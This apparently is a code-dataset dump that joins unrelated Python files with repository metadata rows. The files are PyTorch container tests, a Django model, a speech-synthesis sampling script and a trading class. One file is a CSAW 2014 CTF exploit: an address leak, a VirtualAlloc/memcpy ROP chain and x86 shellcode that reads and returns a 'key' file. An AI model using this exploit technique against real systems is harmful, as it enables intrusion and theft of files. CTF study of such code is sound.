[o for o in out_stepwise if isinstance(o, torch.Tensor)], dim=2
)
assert torch.allclose(target[:, :, :-1], out_cleaned)
def test_sum_reduce():
ones = torch.ones((1, 2, 4, 3, 3))
twos = torch.ones((1, 2, 4, 3, 3)) * 2
res = co.container.reduce_sum([ones, ones])
assert torch.allclose(res, twos)
def test_concat_reduce():
ones = torch.ones((1, 2, 4, 3, 3))
twos = torch.ones((1, 2, 4, 3, 3)) * 2
res = co.container.reduce_concat([ones, twos])
assert res.shape == (1, 4, 4, 3, 3)
assert torch.allclose(res[:, :2], ones)
assert torch.allclose(res[:, 2:], twos)
def test_residual():
input = torch.arange(6, dtype=torch.float).reshape((1, 1, 6))
conv = nn.Conv1d(1, 1, kernel_size=3, padding=1, bias=False)
torch.nn.init.ones_(conv.weight)
co_conv = co.Conv1d.build_from(conv)
co_res = co.Residual(co_conv)
# Target behavior: Discard outputs from temporal padding
target = conv(input) + input
# forward
out_manual_res = co_conv.forward(input) + input
assert torch.allclose(out_manual_res, target)
out_res = co_res.forward(input)
assert torch.allclose(out_res, target)
# forward_steps
out_firsts = co_res.forward_steps(input[:, :, :-1], pad_end=False)
assert torch.allclose(out_firsts, target[:, :, :4])
# forward_step
out_last = co_res.forward_step(input[:, :, -1])
assert torch.allclose(out_last, target[:, :, -2])
def test_residual_shrink():
input = torch.arange(6, dtype=torch.float).reshape((1, 1, 6))
conv = nn.Conv1d(1, 1, kernel_size=3, padding=0, bias=False)
torch.nn.init.ones_(conv.weight)
co_conv = co.Conv1d.build_from(conv)
co_res = co.Residual(co_conv, phantom_padding=True)
# Target behavior: Discard outputs from temporal padding
target = conv(input) + input[:, :, 1:-1]
# forward
out_manual_res = co_conv.forward(input) + input[:, :, 1:-1]
assert torch.allclose(out_manual_res, target)
out_res = co_res.forward(input)
assert torch.allclose(out_res, target)
# forward_step
output_step = []
for t in range(input.shape[2]):
y = co_res.forward_step(input[:, :, t])
if isinstance(y, torch.Tensor):
output_step.append(y)
output_step = torch.stack(output_step, dim=2)
assert torch.allclose(output_step, target)
# forward_steps
co_res.clean_state()
out_firsts = co_res.forward_steps(input[:, :, :-1], pad_end=False)
assert torch.allclose(out_firsts, target[:, :, :3])
# forward_step
out_last = co_res.forward_step(input[:, :, -1])
assert torch.allclose(out_last, target[:, :, -1])
def test_broadcast_reduce():
input = torch.arange(7, dtype=torch.float).reshape((1, 1, 7))
c5 = co.Conv1d(1, 1, kernel_size=5, padding=2, bias=False)
c3 = co.Conv1d(1, 1, kernel_size=3, padding=1, bias=False)
c1 = co.Conv1d(1, 1, kernel_size=1, padding=0, bias=False)
torch.nn.init.ones_(c5.weight)
torch.nn.init.ones_(c3.weight)
torch.nn.init.ones_(c1.weight)
par = co.BroadcastReduce(OrderedDict([("c5", c5), ("c3", c3), ("c1", c1)]))
assert par.stride == 1
assert par.delay == 2
assert par.padding == 2
assert par.receptive_field == 5
assert "BroadcastReduce(" in par.__repr__() and "reduce=" in par.__repr__()
# forward
out_all = par.forward(input)
assert torch.allclose(
out_all, torch.tensor([[[4.0, 10.0, 18.0, 27.0, 36.0, 38.0, 32.0]]])
)
# forward_step
out_steps = [par.forward_step(input[:, :, i]) for i in range(input.shape[2])]
assert all(isinstance(o, TensorPlaceholder) for o in out_steps[: par.delay])
out_steps = torch.stack(out_steps[par.delay :], dim=2)
assert torch.allclose(out_steps, out_all[:, :, : -par.delay])
# forward_steps
par.clean_state()
out_steps_0 = par.forward_steps(input[:, :, :-1], pad_end=False, update_state=False)
out_steps = par.forward_steps(input[:, :, :-1], pad_end=False)
assert torch.allclose(out_steps, out_steps_0)
assert torch.allclose(out_steps, out_all[:, :, : -par.delay - 1])
out_step_0 = par.forward_step(input[:, :, -1], update_state=False) # continuation
out_step = par.forward_step(input[:, :, -1]) # continuation
assert torch.allclose(out_step, out_step_0)
assert torch.allclose(out_step, out_all[:, :, -par.delay - 1])
# with pad_end
par.clean_state()
out_steps = par.forward_steps(input, pad_end=True)
assert torch.allclose(out_steps, out_all)
def test_flat_state_dict():
# >> Part 1: Save both flat and original state dicts
# If modules are not named, it can be flattened
seq_to_flatten = co.Sequential(nn.Conv1d(1, 1, 3))
sd = seq_to_flatten.state_dict()
assert set(sd) == {"0.weight", "0.bias"}
sd_flat = seq_to_flatten.state_dict(flatten=True)
assert set(sd_flat) == {"weight", "bias"}
seq_not_to_flatten = co.Sequential(OrderedDict([("c1", nn.Conv1d(1, 1, 3))]))
sd_no_flat = seq_not_to_flatten.state_dict(flatten=True)
assert set(sd_no_flat) == {"c1.weight", "c1.bias"}
# A nested example:
nested = co.BroadcastReduce(seq_to_flatten, seq_not_to_flatten)
sd = nested.state_dict()
assert set(sd) == {"0.0.weight", "0.0.bias", "1.c1.weight", "1.c1.bias"}
sd_flat = nested.state_dict(flatten=True)
assert set(sd_flat) == {"weight", "bias", "c1.weight", "c1.bias"}
# >> Part 2: Load flat state dict
nested_new = co.BroadcastReduce(
co.Sequential(nn.Conv1d(1, 1, 3)),
co.Sequential(OrderedDict([("c1", nn.Conv1d(1, 1, 3))])),
)
assert not torch.equal(nested[0][0].weight, nested_new[0][0].weight)
assert not torch.equal(nested[0][0].bias, nested_new[0][0].bias)
assert not torch.equal(nested[1].c1.weight, nested_new[1].c1.weight)
assert not torch.equal(nested[1].c1.bias, nested_new[1].c1.bias)
nested_new.load_state_dict(sd_flat, flatten=True)
assert torch.equal(nested[0][0].weight, nested_new[0][0].weight)
assert torch.equal(nested[0][0].bias, nested_new[0][0].bias)
assert torch.equal(nested[1].c1.weight, nested_new[1].c1.weight)
assert torch.equal(nested[1].c1.bias, nested_new[1].c1.bias)
# >> Part 3: Test context manager
with co.utils.flat_state_dict:
# Export works as above despite `flatten=False`
sd_flat2 = nested.state_dict(flatten=False)
assert sd_flat.keys() == sd_flat2.keys()
assert all(torch.equal(sd_flat[key], sd_flat2[key]) for key in sd_flat.keys())
# Loading works as above despite `flatten=False`
nested_new.load_state_dict(sd_flat, flatten=False)
assert torch.equal(nested[0][0].weight, nested_new[0][0].weight)
assert torch.equal(nested[0][0].bias, nested_new[0][0].bias)
assert torch.equal(nested[1].c1.weight, nested_new[1].c1.weight)
assert torch.equal(nested[1].c1.bias, nested_new[1].c1.bias)
assert True # Need to step down here to trigger context manager __exit__
def test_conditional_only_first():
x = torch.ones((1, 1, 3))
def is_training(module, *args):
return module.training
mod = co.Conditional(is_training, co.Multiply(2))
mod.train()
assert torch.equal(mod.forward(x), x * 2)
assert torch.equal(mod.forward_steps(x), x * 2)
assert torch.equal(mod.forward_step(x[:, :, 0]), x[:, :, 0] * 2)
mod.eval()
assert torch.equal(mod.forward(x), x)
assert torch.equal(mod.forward_steps(x), x)
assert torch.equal(mod.forward_step(x[:, :, 0]), x[:, :, 0])
def test_conditional_both_cases():
x = torch.ones((1, 1, 3))
def is_training(module, *args):
return module.training
mod = co.Conditional(is_training, co.Multiply(2), co.Multiply(3))
assert mod.receptive_field == 1
assert (
mod.__repr__()
== """Conditional(\n predicate=is_training\n (0): Lambda(_multiply, takes_time=True)\n (1): Lambda(_multiply, takes_time=True)\n)"""
)
mod.train()
assert torch.equal(mod.forward(x), x * 2)
assert torch.equal(mod.forward_steps(x), x * 2)
assert torch.equal(mod.forward_step(x[:, :, 0]), x[:, :, 0] * 2)
mod.eval()
assert torch.equal(mod.forward(x), x * 3)
assert torch.equal(mod.forward_steps(x), x * 3)
assert torch.equal(mod.forward_step(x[:, :, 0]), x[:, :, 0] * 3)
def test_conditional_delay():
# if_true.delay < if_false.delay
mod = co.Conditional(lambda a, b: True, co.Delay(2), co.Delay(3))
assert mod.delay == 3
assert mod._modules["0"].delay == 3
assert mod._modules["1"].delay == 3
# if_true.delay > if_false.delay
mod = co.Conditional(lambda a, b: True, co.Delay(3), co.Delay(2))
assert mod.delay == 3
assert mod._modules["0"].delay == 3
assert mod._modules["1"].delay == 3
def test_condition_torch_modules():
mod = co.Conditional(
lambda a, b: True,
torch.nn.Sigmoid(),
torch.nn.Softmax(),
)
assert (
mod.__repr__()
== "Conditional(\n predicate=lambda a, b: True\n (0): Sigmoid()\n (1): Softmax(dim=None)\n)"
)
def test_broadcast():
x = 42
mod = co.Broadcast(2)
assert mod.delay == 0
assert mod.forward(x) == [x, x]
assert mod.forward_step(x) == [x, x]
assert mod.forward_steps(x) == [x, x]
def test_parallel():
x = torch.randn((1, 1, 3))
xx = [x, x]
c3 = co.Conv1d(1, 1, kernel_size=3, padding=1, bias=False)
c1 = co.Conv1d(1, 1, kernel_size=1, padding=0, bias=False)
par = co.Parallel(OrderedDict([("c3", c3), ("c1", c1)]))
assert par.delay == 1
assert par.padding == 1
assert par.stride == 1
o1 = par.forward(xx)
assert torch.equal(c3.forward(x), o1[0])
assert torch.equal(c1.forward(x), o1[1])
o2 = par.forward_steps(xx, pad_end=True, update_state=False)
assert torch.equal(c3.forward_steps(x, pad_end=True), o2[0])
assert torch.equal(c1.forward_steps(x, pad_end=True), o2[1])
par.clean_state()
par.forward_step([x[:, :, 0], x[:, :, 0]], update_state=True)
o3 = par.forward_step([x[:, :, 1], x[:, :, 1]], update_state=False)
assert torch.equal(c3.forward_step(x[:, :, 1]), o3[0])
assert torch.equal(c1.forward_step(x[:, :, 0]), o3[1]) # x[:,:,0] due to auto delay
def test_reduce():
x = torch.tensor([[[1.0, 2.0]]])
xx = [x, x]
mod = co.Reduce("sum")
assert mod.delay == 0
assert torch.equal(mod.forward(xx), torch.tensor([[[2.0, 4.0]]]))
assert torch.equal(mod.forward_steps(xx), torch.tensor([[[2.0, 4.0]]]))
assert torch.equal(
mod.forward_step([x[:, :, 0], x[:, :, 0]]), torch.tensor([[2.0]])
)
def test_parallel_sequential():
x = torch.arange(7, dtype=torch.float).reshape((1, 1, 7))
# Test two equivalent implementations
# First
c5 = co.Conv1d(1, 1, kernel_size=5, padding=2, bias=False)
c3 = co.Conv1d(1, 1, kernel_size=3, padding=1, bias=False)
c1 = co.Conv1d(1, 1, kernel_size=1, padding=0, bias=False)
torch.nn.init.ones_(c5.weight)
torch.nn.init.ones_(c3.weight)
torch.nn.init.ones_(c1.weight)
mod1 = co.BroadcastReduce(c5, c3, c1, reduce="sum")
# Second
c5 = co.Conv1d(1, 1, kernel_size=5, padding=2, bias=False)
c3 = co.Conv1d(1, 1, kernel_size=3, padding=1, bias=False)
c1 = co.Conv1d(1, 1, kernel_size=1, padding=0, bias=False)
torch.nn.init.ones_(c5.weight)
torch.nn.init.ones_(c3.weight)
torch.nn.init.ones_(c1.weight)
mod2 = co.Sequential(
co.Broadcast(), # Sequential can infer broadcast dimensions
co.Parallel(c5, c3, c1),
co.Reduce("sum"),
)
# Compare
o1 = mod1.forward(x)
o2 = mod2.forward(x)
assert torch.equal(o1, o2)
def test_parallel_dispatch():
with pytest.raises(AssertionError):
co.ParallelDispatch([1.0, "nah"])
inputs = [10, 11, 12]
mapping = [2, 0, [0, 2], 2]
module = co.ParallelDispatch(mapping)
outputs1 = module.forward(inputs)
outputs2 = module.forward_step(inputs)
outputs3 = module.forward_steps(inputs)
assert outputs1 == [12, 10, [10, 12], 12]
assert outputs2 == [12, 10, [10, 12], 12]
assert outputs3 == [12, 10, [10, 12], 12]
| 31.52514 | 143 | 0.624845 |
abf8894b09295d75fbe3b3b420d30f7d1212e4ff | 257 | py | Python | authentication/models.py | mzazakeith/Therapy101 | be00dd988c6b636f52b57638e70c89da3acbf1a3 | [
"MIT"
] | null | null | null | authentication/models.py | mzazakeith/Therapy101 | be00dd988c6b636f52b57638e70c89da3acbf1a3 | [
"MIT"
] | 15 | 2020-06-05T18:55:18.000Z | 2022-03-08T22:20:14.000Z | authentication/models.py | mzazakeith/Therapy101 | be00dd988c6b636f52b57638e70c89da3acbf1a3 | [
"MIT"
] | null | null | null | from django.contrib.auth.models import AbstractUser
from django.db import models
class User(AbstractUser):
is_slta = models.BooleanField(default=False)
is_slt = models.BooleanField(default=False)
is_parent = models.BooleanField(default=False)
| 28.555556 | 51 | 0.785992 |
abf9214c7a6d2106de8bbc2f4be984b13c38f4bf | 10,200 | py | Python | parrot/sample.py | weixsong/Codeblock | 413e7acd6addc4950bffe2d57eb0cc7973c6fb7a | [
"MIT"
] | null | null | null | parrot/sample.py | weixsong/Codeblock | 413e7acd6addc4950bffe2d57eb0cc7973c6fb7a | [
"MIT"
] | null | null | null | parrot/sample.py | weixsong/Codeblock | 413e7acd6addc4950bffe2d57eb0cc7973c6fb7a | [
"MIT"
] | null | null | null | """Sampling code for the parrot.
Loads the trained model and samples.
"""
import numpy
import os
import cPickle
import logging
from blocks.serialization import load_parameters
from blocks.model import Model
from datasets import parrot_stream
from model import Parrot
from utils import (
attention_plot, sample_parse, create_animation, numpy_one_hot)
from generate import generate_wav
logging.basicConfig()
data_dir = os.environ['FUEL_DATA_PATH']
args = sample_parse()
with open(os.path.join(
args.save_dir, 'config',
args.experiment_name + '.pkl')) as f:
saved_args = cPickle.load(f)
assert saved_args.dataset == args.dataset
if args.use_last:
params_mode = 'last_'
else:
params_mode = 'best_'
args.samples_name = params_mode + args.samples_name
with open(os.path.join(
args.save_dir, "pkl",
params_mode + args.experiment_name + ".tar"), 'rb') as src:
parameters = load_parameters(src)
test_stream = parrot_stream(
args.dataset, saved_args.use_speaker, ('test',), args.num_samples,
args.num_steps, sorting_mult=1, labels_type=saved_args.labels_type,
raw_data=args.plot_raw)
data_tr = next(test_stream.get_epoch_iterator())
data_tr = {
source: data for source, data in zip(test_stream.sources, data_tr)}
print "Loaded sources from test_stream: ", data_tr.keys()
features_tr = data_tr.get('features', None)
features_mask_tr = data_tr.get('features_mask', None)
speaker_tr = data_tr.get('speaker_index', None)
labels_tr = data_tr.get('labels', None)
labels_mask_tr = data_tr.get('labels_mask', None)
start_flag_tr = data_tr.get('start_flag', None)
raw_audio_tr = data_tr.get('raw_audio', None)
if args.random_speaker:
numpy.random.seed(1)
speaker_tr = numpy.random.random_integers(
1, saved_args.num_speakers - 1, (args.num_samples, 1))
speaker_tr = numpy.int8(speaker_tr)
if args.phrase is not None:
import pickle
data_path = os.environ['FUEL_DATA_PATH']
char2code_path = os.path.join(data_path, args.dataset, 'char2code.pkl')
with open(char2code_path, 'r') as f:
char2code = pickle.load(f)
labels_tr = numpy.array([char2code[x] for x in args.phrase], dtype='int8')
labels_tr = numpy.tile(labels_tr, (args.num_samples, 1))
labels_mask_tr = numpy.ones(labels_tr.shape, dtype='float32')
if args.speaker_id and saved_args.use_speaker:
speaker_tr = speaker_tr * 0 + args.speaker_id
if args.mix and saved_args.use_speaker:
speaker_tr = speaker_tr * 0
parameters['/parrot/lookuptable.W'][0] = \
args.mix * parameters['/parrot/lookuptable.W'][15] + \
(1 - args.mix) * parameters['/parrot/lookuptable.W'][11]
# Set default values for old config files.
# if not hasattr(saved_args, 'weak_feedback'):
# saved_args.weak_feedback = False
# if not hasattr(saved_args, 'full_feedback'):
# saved_args.full_feedback = False
if not hasattr(saved_args, 'raw_output'):
saved_args.raw_output = False
parrot_args = {
'input_dim': saved_args.input_dim,
'output_dim': saved_args.output_dim,
'rnn_h_dim': saved_args.rnn_h_dim,
'readouts_dim': saved_args.readouts_dim,
'weak_feedback': saved_args.weak_feedback,
'full_feedback': saved_args.full_feedback,
'feedback_noise_level': None,
'layer_norm': saved_args.layer_norm,
'use_speaker': saved_args.use_speaker,
'num_speakers': saved_args.num_speakers,
'speaker_dim': saved_args.speaker_dim,
'which_cost': saved_args.which_cost,
'num_characters': saved_args.num_characters,
'attention_type': saved_args.attention_type,
'attention_alignment': saved_args.attention_alignment,
'sampling_bias': args.sampling_bias,
'sharpening_coeff': args.sharpening_coeff,
'timing_coeff': args.timing_coeff,
'encoder_type': saved_args.encoder_type,
'raw_output': saved_args.raw_output,
'name': 'parrot'}
parrot = Parrot(**parrot_args)
features, features_mask, labels, labels_mask, speaker, start_flag, raw_audio = \
parrot.symbolic_input_variables()
cost, extra_updates, attention_vars, cost_raw = parrot.compute_cost(
features, features_mask, labels, labels_mask,
speaker, start_flag, args.num_samples, raw_audio=raw_audio)
model = Model(cost)
model.set_parameter_values(parameters)
print "Successfully loaded the parameters."
if args.sample_one_step:
gen_x, gen_k, gen_w, gen_pi, gen_phi, gen_pi_att = \
parrot.sample_using_input(data_tr, args.num_samples)
else:
gen_x, gen_k, gen_w, gen_pi, gen_phi, gen_pi_att = parrot.sample_model(
labels_tr, labels_mask_tr, features_mask_tr,
speaker_tr, args.num_samples, args.num_steps)
print "Successfully sampled the parrot."
gen_x = gen_x.swapaxes(0, 1)
gen_phi = gen_phi.swapaxes(0, 1)
features_lengths = []
labels_lengths = []
for idx in range(args.num_samples):
# Heuristic for deciding when to end the sampling.
this_phi = gen_phi[idx]
this_labels_length = int(labels_mask_tr[idx].sum())
try:
this_features_length = numpy.where((
this_phi[:, this_labels_length, numpy.newaxis] >
this_phi[:, :this_labels_length-1]).all(axis=1))[0][0]
this_features_length = numpy.minimum(
args.num_steps, this_features_length + 40) # Small extra time.
except:
print "Its better to increase the number of samples."
this_features_length = args.num_steps
features_lengths.append(this_features_length)
labels_lengths.append(this_labels_length)
if saved_args.raw_output:
print "Sampling and saving raw audio..."
to_save_path = os.path.join(args.save_dir, 'samples', 'new_raw')
if not os.path.exists(to_save_path):
os.makedirs(to_save_path)
parrot.sampleRnn.sample_raw(gen_x.swapaxes(0, 1).copy(), features_lengths, args.samples_name, to_save_path)
print "Successfully sampled raw audio..."
norm_info_file = os.path.join(
data_dir, args.dataset,
'norm_info_mgc_lf0_vuv_bap_63_MVN.dat')
for idx, this_sample in enumerate(gen_x):
this_sample = this_sample[:features_lengths[idx]]
generate_wav(
this_sample,
os.path.join(args.save_dir, 'samples'),
args.samples_name + '_' + str(idx),
sptk_dir=args.sptk_dir,
world_dir=args.world_dir,
norm_info_file=norm_info_file,
do_post_filtering=args.do_post_filtering)
if args.plot_raw:
from scipy.io import wavfile
raw_audio = data_tr['raw_audio'].swapaxes(0, 1)
for idx in range(args.num_samples):
this_raw = numpy.concatenate(
raw_audio[idx])[:80*int(features_mask_tr.sum(axis=0)[idx])]
wavfile.write(
os.path.join(
args.save_dir, 'samples',
'raw_' + args.samples_name + '_' + str(idx) + '.wav'),
16000, this_raw)
if args.process_originals:
assert not args.new_sentences
for i, this_sample in enumerate(features_tr.swapaxes(0, 1)):
this_sample = this_sample[:int(features_mask_tr.sum(axis=0)[i])]
generate_wav(
this_sample,
os.path.join(args.save_dir, 'samples'),
'original_' + args.samples_name + '_' + str(i),
sptk_dir=args.sptk_dir,
world_dir=args.world_dir,
norm_info_file=norm_info_file,
do_post_filtering=args.do_post_filtering)
all_text = []
for idx in range(args.num_samples):
this_labels = labels_tr[idx, :labels_lengths[idx]]
this_phi = gen_phi[idx][:features_lengths[idx], :labels_lengths[idx]]
this_text = attention_plot(
this_phi,
os.path.join(
args.save_dir, 'samples',
args.samples_name + '_' + str(idx)),
this_labels,
args.dataset,
saved_args.labels_type)
this_text = ''.join(this_text)
all_text.append(this_text + '\n')
with open(
os.path.join(
args.save_dir, 'samples', args.samples_name + '.txt'),
'w') as text_file:
text_file.write(''.join(all_text).encode('utf8'))
if args.debug_plot:
from utils import full_plot
gen_k = gen_k.swapaxes(0, 1)
gen_w = gen_w.swapaxes(0, 1)
gen_pi = gen_pi.swapaxes(0, 1)
gen_phi = gen_phi.swapaxes(0, 1)
gen_pi_att = gen_pi_att.swapaxes(0, 1)
for i in range(args.num_samples):
this_num_steps = int(features_mask_tr.sum(axis=0)[i])
this_labels_length = int(labels_mask_tr.sum(axis=1)[i])
this_x = gen_x[i][:this_num_steps]
this_k = gen_k[i][:this_num_steps]
this_w = gen_w[i][:this_num_steps]
this_pi = gen_pi[i][:this_num_steps]
this_phi = gen_phi[i][:this_num_steps, :this_labels_length]
this_pi_att = gen_pi_att[i][:this_num_steps]
full_plot(
[this_x, this_pi_att, this_k, this_w, this_phi],
os.path.join(
args.save_dir, 'samples',
args.samples_name + '_' + str(i) + '.png'))
if args.animation:
for i in range(args.num_samples):
this_num_steps = int(features_mask_tr.sum(axis=0)[i])
this_labels_length = int(labels_mask_tr.sum(axis=1)[i])
this_x = gen_x[i][:this_num_steps]
this_k = gen_k[i][:this_num_steps]
this_w = gen_w[i][:this_num_steps]
this_pi = gen_pi[i][:this_num_steps]
this_phi = gen_phi[i][:this_num_steps, :this_labels_length]
this_pi_att = gen_pi_att[i][:this_num_steps]
create_animation(
[this_x, this_pi_att, this_k, this_w, this_phi],
args.samples_name + '_' + str(i) + '.wav',
args.samples_name + '_' + str(i),
os.path.join(args.save_dir, 'samples'))
if args.process_originals:
for i in range(args.num_samples):
this_num_steps = int(features_mask_tr.sum(axis=0)[i])
this_x = features_tr[:, i][:this_num_steps]
this_phoneme = labels_tr[:, i][:this_num_steps]
create_animation(
[this_x, numpy_one_hot(
this_phoneme, saved_args.num_characters)],
'original_' + args.samples_name + '_' + str(i) + '.wav',
'original_' + args.samples_name + '_' + str(i),
os.path.join(args.save_dir, 'samples'))
| 35.172414 | 111 | 0.678824 |
abfa15dff9f5420c035b3826b1395528ac642299 | 3,517 | py | Python | csaw-2014/exploit/400-1/exploit.py | anarcheuz/CTF | beaccbfe036d90c7d7018978bad288c831d3f8f5 | [
"MIT"
] | 2 | 2015-03-24T22:20:08.000Z | 2018-05-12T16:41:13.000Z | csaw-2014/exploit/400-1/exploit.py | anarcheuz/CTF | beaccbfe036d90c7d7018978bad288c831d3f8f5 | [
"MIT"
] | null | null | null | csaw-2014/exploit/400-1/exploit.py | anarcheuz/CTF | beaccbfe036d90c7d7018978bad288c831d3f8f5 | [
"MIT"
] | null | null | null | import socket
import re
from struct import pack
from time import sleep
def recv_until(s, string=""):
text = ""
while 1 :
data = s.recv(4096)
text+=data
if not data or data.find(string) != -1:
break
return text
def leak(s):
s.send("A\n")
text = recv_until(s, "Selection:")
slide, stack = re.findall('0x[0-9a-f]{8}', text)
slide = int(slide, 16) + 0x400000
stack = int(stack, 16)
return (slide, stack)
def vuln(s, payload):
s.send("V\n")
recv_until(s, "(with some constraints).")
s.send(payload)
host = '192.168.0.10'
s=socket.create_connection((host, 9998))
recv_until(s, "Password:")
s.send('GreenhornSecretPassword!!!\n')
### leak
recv_until(s, 'Selection:')
slide, stack = leak(s)
VirtualAlloc = 0x11c0 + slide
memcpy = 0x1684 + slide
print_output = 0x14d0 + slide
pop4 = 0x199e + slide
ret = 0x19a2 + slide
eip_off = 0x404
buffer_start = stack - 0x3f8
shellcode_loc = buffer_start + 4
shellcode_len = 0x400
### ROP
"""cedcl_ convention"""
rop = [
VirtualAlloc, #wrapper
pop4,
0,
0x1000,
0x40,
buffer_start + eip_off + 4 * 8, #will stock ptr to alloc' zone in memcpy 1st arg
memcpy,
ret, #will return to 1st param
0xcccccccc,
shellcode_loc,
shellcode_len
]
shellcode = [0x55, 0x89, 0xE5, 0x81, 0xEC, 0x10, 0x00, 0x00, 0x00, 0x89, 0x45,
0xFC, 0x64, 0x8B, 0x1D, 0x30, 0x00, 0x00, 0x00, 0x8B, 0x5B, 0x0C, 0x8B,
0x5B, 0x14, 0x8B, 0x1B, 0x8B, 0x1B, 0x8B, 0x5B, 0x10, 0x8B, 0x73, 0x3C,
0x01, 0xDE, 0x8B, 0x76, 0x78, 0x01, 0xDE, 0x56, 0x8B, 0x7E, 0x20, 0x01,
0xDF, 0x8B, 0x4E, 0x14, 0x31, 0xC0, 0x57, 0x51, 0x8B, 0x3F, 0x01, 0xDF,
0xBE, 0xFA, 0x00, 0x00, 0x00, 0x03, 0x75, 0xFC, 0x31, 0xC9, 0xB1, 0x0E,
0xF3, 0xA6, 0x59, 0x5F, 0x74, 0x0B, 0x81, 0xC7, 0x04, 0x00, 0x00, 0x00,
0x40, 0xE2, 0xDF, 0x0F, 0x0B, 0x5E, 0x8B, 0x56, 0x24, 0x01, 0xDA, 0xD1,
0xE0, 0x01, 0xD0, 0x31, 0xC9, 0x66, 0x8B, 0x08, 0x8B, 0x46, 0x1C, 0x01,
0xD8, 0xC1, 0xE1, 0x02, 0x01, 0xC8, 0x8B, 0x10, 0x01, 0xDA, 0x5E, 0x89,
0xF7, 0x31, 0xC9, 0x89, 0x55, 0xF8, 0x89, 0x5D, 0xF4, 0xBE, 0x09, 0x01,
0x00, 0x00, 0x03, 0x75, 0xFC, 0x56, 0xFF, 0x75, 0xF4, 0xFF, 0x55, 0xF8,
0x89, 0xC3, 0x68, 0x6B, 0x65, 0x79, 0x00, 0x89, 0xE0, 0x68, 0x00, 0x00,
0x00, 0x00, 0x68, 0x80, 0x00, 0x00, 0x00, 0x68, 0x03, 0x00, 0x00, 0x00,
0x68, 0x00, 0x00, 0x00, 0x00, 0x68, 0x01, 0x00, 0x00, 0x00, 0xB9, 0x00,
0x00, 0x00, 0x80, 0x51, 0x50, 0xFF, 0xD3, 0x81, 0xC4, 0x04, 0x00, 0x00,
0x00, 0x50, 0xBE, 0x15, 0x01, 0x00, 0x00, 0x03, 0x75, 0xFC, 0x56, 0xFF,
0x75, 0xF4, 0xFF, 0x55, 0xF8, 0x5B, 0x81, 0xEC, 0x00, 0x01, 0x00, 0x00,
0x89, 0xE1, 0x68, 0x00, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0x00,
0x68, 0x00, 0x01, 0x00, 0x00, 0x51, 0x53, 0xFF, 0xD0, 0x8B, 0x45, 0xFC,
0x8B, 0x80, 0x1E, 0x01, 0x00, 0x00, 0x54, 0xFF, 0xD0, 0x0F, 0x0B, 0x47,
0x65, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x41, 0x64, 0x64, 0x72, 0x65, 0x73,
0x73, 0x00, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x46, 0x69, 0x6C, 0x65,
0x41, 0x00, 0x52, 0x65, 0x61, 0x64, 0x46, 0x69, 0x6C, 0x65, 0x00,
# exclude last 4 bytes since we want to replace them
0xCC, 0xCC, 0xCC, 0xCC, ][:-4]
exploit = "CSAW" #mandatory
exploit += "".join([chr(c) for c in shellcode])
exploit += pack("<I", print_output) #print result of ReadFile back to us
exploit += "\xcc"*(eip_off - len(exploit))
exploit += "".join([pack("<I", dword) for dword in rop])
vuln(s, exploit)
s.shutdown(socket.SHUT_WR)
sleep(1)
print s.recv(1024)
| 33.179245 | 88 | 0.639181 |
abfa9fcc8c8d6fc061a4cea57ebd8295d4f79af3 | 9,504 | py | Python | vnpy/trader/app/spreadTrading/stBase.py | cmbclh/vnpy1.7 | 25a95ba63c7797e92ba45450d79ee1326135fb47 | [
"MIT"
] | 1 | 2017-10-09T06:05:11.000Z | 2017-10-09T06:05:11.000Z | vnpy/trader/app/spreadTrading/stBase.py | cmbclh/vnpy-1.7 | ccca92139198a0d213c15fe531f37c1c702ee968 | [
"MIT"
] | null | null | null | vnpy/trader/app/spreadTrading/stBase.py | cmbclh/vnpy-1.7 | ccca92139198a0d213c15fe531f37c1c702ee968 | [
"MIT"
] | null | null | null | # encoding: UTF-8
from __future__ import division
from datetime import datetime
from math import floor
import pandas as pd
import numpy as np
import sys
sys.path.append('../')
#sys.path.append('D:\\tr\\vnpy-master\\vn.trader\\DAO')
sys.path.append('D:\\tr\\vnpy-1.7\\vnpy\\DAO')
sys.path.append('D:\\tr\\vnpy-1.7\\vnpy\\common')
import vnpy.DAO
import vnpy.common
from vnpy.DAO import *
from vnpy.trader.vtConstant import (EMPTY_INT, EMPTY_FLOAT,
EMPTY_STRING, EMPTY_UNICODE)
EVENT_SPREADTRADING_TICK = 'eSpreadTradingTick.'
EVENT_SPREADTRADING_POS = 'eSpreadTradingPos.'
EVENT_SPREADTRADING_LOG = 'eSpreadTradingLog'
EVENT_SPREADTRADING_ALGO = 'eSpreadTradingAlgo.'
EVENT_SPREADTRADING_ALGOLOG = 'eSpreadTradingAlgoLog'
########################################################################
class StLeg(object):
""""""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.vtSymbol = EMPTY_STRING # 代码
self.ratio = EMPTY_INT # 实际交易时的比例
self.multiplier = EMPTY_FLOAT # 计算价差时的乘数
self.payup = EMPTY_INT # 对冲时的超价tick
self.bidPrice = EMPTY_FLOAT
self.askPrice = EMPTY_FLOAT
self.bidVolume = EMPTY_INT
self.askVolume = EMPTY_INT
self.longPos = EMPTY_INT
self.shortPos = EMPTY_INT
self.netPos = EMPTY_INT
self.actleg = EMPTY_INT
self.actlegPos = EMPTY_FLOAT
self.passleg = EMPTY_INT
self.passlegPos = EMPTY_FLOAT
self.profitloss = EMPTY_FLOAT
########################################################################
class StSpread(object):
""""""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.name = EMPTY_UNICODE # 名称
self.symbol = EMPTY_STRING # 代码(基于组成腿计算)
self.activeLeg = None # 主动腿
self.passiveLegs = [] # 被动腿(支持多条)
self.allLegs = [] # 所有腿
self.bidPrice = EMPTY_FLOAT
self.askPrice = EMPTY_FLOAT
self.bidVolume = EMPTY_INT
self.askVolume = EMPTY_INT
self.time = EMPTY_STRING
self.longPos = EMPTY_INT
self.shortPos = EMPTY_INT
self.netPos = EMPTY_INT
self.actlegLongPos = EMPTY_INT
self.actlegLongValue = EMPTY_FLOAT
self.actlegShortPos = EMPTY_INT
self.actlegShortValue = EMPTY_FLOAT
self.passlegLongPos = EMPTY_INT
self.passlegLongValue = EMPTY_FLOAT
self.passlegShortgPos = EMPTY_INT
self.passlegShortValue = EMPTY_FLOAT
self.profitloss = EMPTY_FLOAT
#----------------------------------------------------------------------
def initSpread(self):
"""初始化价差"""
# 价差最少要有一条主动腿
if not self.activeLeg:
return
# 生成所有腿列表
self.allLegs.append(self.activeLeg)
self.allLegs.extend(self.passiveLegs)
# 生成价差代码
legSymbolList = []
